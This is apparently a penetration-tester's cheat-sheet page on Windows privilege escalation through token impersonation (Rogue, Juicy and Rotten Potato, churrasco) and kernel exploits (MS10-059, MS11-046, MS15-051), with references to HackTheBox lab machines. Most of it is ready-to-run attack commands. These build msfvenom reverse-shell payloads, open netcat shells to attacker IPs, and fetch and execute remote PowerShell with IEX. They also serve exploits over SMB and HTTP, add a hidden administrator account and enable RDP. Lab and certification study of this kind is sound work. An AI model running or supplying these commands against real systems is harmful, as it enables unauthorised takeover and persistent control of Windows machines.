4 Kernel Exploits

Windows PrivEsc Methods

Family

Versions

Rogue Potato

Latest Version

SHOULD work on Windows 10

Juicy Potato

Upgrade of Rotten

Server 2008 R2 - No Hotfixes Windows 7 Enterprise 6.1.7600

Patched in Latest Win-10

Rotten Potato

Old

Year: 2016

Churrasco

Non-Potato

Chimichurri

Non-Potato : MS10-059

Basics

Required for Potato:

> whoami
Local Service

> whoami /priv
SeImpersonatePrivilege ..Enabled

Token Impersonations

Service Accounts Cant login with them, but can escalate them

Rogue Potato

> RoguePotato.exe -r 10.x.x.x -l 9999 -e "C:\PrivEsc\reverse.exe"
> nc -nvlp 9999

Juicy Potato BEST

Token Impersonation
https://github.com/ohpe/juicy-potato
http://ohpe.it/juicy-potato/CLSID (or powershell script)
https://github.com/ivanitlearning/Juicy-Potato-x86/releases

whoami /priv   ..SeImpersonatePrivilege = JuicyPotato
JuicyPotato.exe -l 5555 -p C:\PrivEsc\reverse.exe -t * -c GUID_CLSID
Juicy.Potato.x86.exe -l 5555 -p "C:\inetpub\wwwroot\shell.exe" -t * -c {F087771F-D74F-4C1A-BB8A-E16ACA9124EA}
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\intepub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t *
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\intepub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

nc -nvlp 5555
whoami ..system

Juicy Potato + Powershell

Reverse Shell with Admin
JP will use Elevated Powershell to grab/exe reverse-ps1-shell
https://ohpe.it/juicy-potato/
REF: ArcticHTB

> cp /opt/JuicyPotato.exe jp.exe
> cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 revshell.ps1
> vim revshell.ps1
Add this to the end of the file:
Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 7600

> sudo impacket-smbserver kali .

> copy \\10.10.14.34\kali\jp.exe .
> jp.exe -t * -p C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -l 9001 -a "-c IEX(new-object net.webclient).downloadstring('http://$IP:9090/revshell.ps1')" -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

> nc -lvnp 7600
> whoami ..system!!

Rotten Potato

Exploit from 2016 Service Accounts could get System tickets and Impersonate

churrasco

REF: GrannyHTB GrandpaHTB
https://technet.microsoft.com/library/security/ms09-012
Token impersonation via churrasco
To escalate privs to System - developed by Cesar Cerrudo.
Server 2003 allows Network Service and Local Service to impersonate 'System'
Patched by Microsoft in Windows 2012 (MS09-12).
On newer systems Juicy Potato works fine.
But on older systems, token impersonation is abused via the churrasco exploit.
If you have access to a box as nt authority\network service
IE: You managed to upload ASP.NET shell
You can easily elevate your privileges on the box.
You can download the exploit here and compile by yourself
or you can use the one from sqlninja which is located at /usr/share/sqlninja/apps/churrasco.exe
It’s used by sqlninja in cases when we bruteforced sa password.

After uploading you can easily

Elevate your privileges.
Create an Admin account

------------------------
Share from Kali/smb:

locate churrasco.exe
wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
cp /usr/share/sqlninja/apps/churrasco.exe /tmp
cp /usr/share/sqlninja/apps/nc.exe /tmp
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.98 RPORT=5555 -f exe > /tmp/venomshell.exe

locate smbserver.py
cd /usr/share/doc/python3-impacket/examples/
sudo python3 smbserver.py share /tmp
nc -nvlp 5555


------------------------
Windows:

whoami /priv    ..SeImpersonatePrivilege - Yes!
systeminfo      ..Server 2003 - Yes!

cd C:\Windows\Temp
copy \\10.x.x.x\share\nc.exe .
copy \\10.x.x.x\share\venomshell.exe .
copy \\10.x.x.x\share\churrasco.exe .

> \\10.x.x.x\share\churrasco.exe -d whoami
> churrasco -d "net user /add <username> <password>"
> churrasco -d "net localgroup administrators <username> /add"
> churrasco -d "net localgroup "Remote Desktop Users" <username> /add"
> churrasco.bin "net user oscp oscp /add && net localgroup Administrators oscp /add"
> churrasco -d "'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f"
linux> rdesktop -u oscp -p oscp 10.x.x.x

> churrasco.exe -d venomshell.exe
> churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"
> \\10.x.x.x\share\churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"

chimichurri

MS10-059
Found with WindowsExploitSuggester
Server 2008 R2 Datacenter 6.1.7600 N/A Build 7600 No Patch 64bit
github/Re4son ..other blog:

cd /opt
git clone https://github.com/egre55/windows-kernel-exploits
cd windows-kernel-exploits/MS10–059: Chimichurri/Compiled
cp Chimichurri.exe .
pythom -m SimpleHTTPServer 4444

cd C:\ColdFusion8\  or:
cd C:\Windows\Temp
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInterative -NoProfile -File wget.ps1
Chimichurri.exe 10.10.14.xx 5555
nc -nvlp 5555
connected ..system!!

----------
or:

cd /usr/share/doc/python3-impacket/examples
sudo python3 ./smbserver.py share /tmp
nc -nvlp 5555

cd C:\Windows\Temp\
copy \\$MyIP\share\Chimichurri.exe .
Chimichurri.exe $MyIP 5555
system!!

----------
chimichurri.exe $MyIP 5555
nc -nvlp 5555
system!

MS11-046 (AFD PrivEsc)

The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input which allows local users to elevate privileges.
ms11-046.exe 6.1.7600 Build 7600 - for 32bit only
https://www.exploit-db.com/exploits/40564/

https://github.com/abatchy17/WindowsExploits
https://github.com/abatchy17/WindowsExploits/blob/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS11-046/MS11-046.exe

smbserver.py share
\\10.10.14.34\share\MS11-046.exe
whoami ..system!

https://github.com/rasta-mouse/Watson

or
Download from:
https://www.exploit-db.com/exploits/40564

Compile:
apt install mingw-w64  ..if not installed
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

python -m SimpleHTTPServer 8080
wget and curl are not installed on the machine however powershell is.
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8080/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
whoami ..system!

MS15-051

REF: DrupalPhpVuln

MS15-051 privesc
github/hfiref0x ..compiled Taihou64.exe (firefox thought virus)
github/SecWiki ..MS15-051 ..compiled ..zipped ..download

cp ms15-051x64.exe .
http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe whoami
system!

http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe "nc64.exe -e 10.x.x.x 5555"
nc -nvlp 5555
system!

Bonus PrivEsc:
ms15–051x64.exe whoami   ..easy

Send and Execute

Execute files from UNC shares
Ex: DrupalPhpVuln

impacket-smbserver share `myfolder`
http://10.x.x.x/ippsec.php?fexe=\\10.x.x.x\share\privesc.exe whoami

Previous3 PrivEsc Next5 Looting

Last updated 2 years ago

Was this helpful?

Basics

Required for Potato:

Token Impersonations

Rogue Potato

Juicy Potato **BEST**

Juicy Potato + Powershell

Rotten Potato

churrasco

chimichurri

MS11-046 (AFD PrivEsc)

MS15-051

Send and Execute

Juicy Potato BEST